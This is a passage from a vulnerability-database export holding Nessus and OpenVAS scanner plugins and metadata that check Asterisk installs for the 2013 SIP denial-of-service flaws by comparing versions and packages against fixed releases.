script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.12.3\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"10.12.3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< 
tolower(version))\n {\n fixed = \"1.8.23.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.15-cert3\n if (version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2.x < 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-19T14:50:35", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
The application does not properly handle an invalid SDP in a SIP request if such a request defines media descriptions and then defines connection data.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver Invalid SDP Denial of Service (AST-2013-005)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "8007.PRM", "href": "https://www.tenable.com/plugins/nnm/8007", "sourceData": "Binary data 8007.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-19T14:50:35", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
The application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-10T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "8006.PRM", "href": "https://www.tenable.com/plugins/nnm/8006", "sourceData": "Binary data 8006.prm", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:49", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by a denial of service vulnerability. 
\n\nThe application does not properly handle 'ACK' messages with SDP after a channel has been closed.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2013_004.NASL", "href": "https://www.tenable.com/plugins/nessus/69558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69558);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-5641\");\n script_bugtraq_id(62021);\n\n script_name(english:\"Asterisk SIP Channel Driver ACK with SDP Denial of Service (AST-2013-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by a\ndenial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by a denial of\nservice vulnerability. 
\n\nThe application does not properly handle 'ACK' messages with SDP after a\nchannel has been closed.\");\n # https://www.asterisk.org/downloads/asterisk-news/asterisk-1815-cert3-18231-10123-10123-digiumphones-112-cert2-and-1151-now\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?116d061b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-21064\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.23.1 / 11.5.1 / Certified Asterisk 1.8.15-cert3\n/ 11.2-cert2, or apply the appropriate patch listed in the Asterisk\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n # Open Source 11x < 11.5.1\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.5.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.17.0 to < 1.8.23.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n lower_cutoff = \"1.8.17.0\";\n fixed = \"1.8.23.1\";\n if (\n (ver_compare(ver:version, fix:lower_cutoff, app:\"asterisk\") >= 0)\n &&\n (ver_compare(ver:version, fix:fixed, app:\"asterisk\") < 0)\n )\n vulnerable = -1;\n }\n\n # Asterisk Certified 1.8.15-cert3\n if 
(version =~ \"^1\\.8\\.15([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.15-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 11.2-cert2\n if (version =~ \"^11\\.2([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"11.2-cert2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-18T14:26:54", "description": "The remote host is affected by the vulnerability described in GLSA-201401-15 (Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-01-21T00:00:00", "type": "nessus", "title": "GLSA-201401-15 : Asterisk: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686", "CVE-2013-5641", "CVE-2013-5642", "CVE-2013-7100"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:asterisk", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-15.NASL", "href": "https://www.tenable.com/plugins/nessus/72054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72054);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_xref(name:\"GLSA\", value:\"201401-15\");\n\n script_name(english:\"GLSA-201401-15 : Asterisk: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-15\n(Asterisk: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Asterisk. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code with the privileges of\n the process, cause a Denial of Service condition, or obtain sensitive\n information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Asterisk 11.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-11.7.0'\n All Asterisk 1.8.* users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/asterisk-1.8.25.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/asterisk\", unaffected:make_list(\"ge 11.7.0\", \"rge 1.8.25.0\"), vulnerable:make_list(\"lt 11.7.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Asterisk\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-07-24T12:51:52", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:892749", "href": "http://plugins.openvas.org/nasl.php?oid=892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892749);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2749.html\");\n\n\n 
script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", 
ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:51:47", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:866890", "href": "http://plugins.openvas.org/nasl.php?oid=866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866890);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. 
Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15560\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n 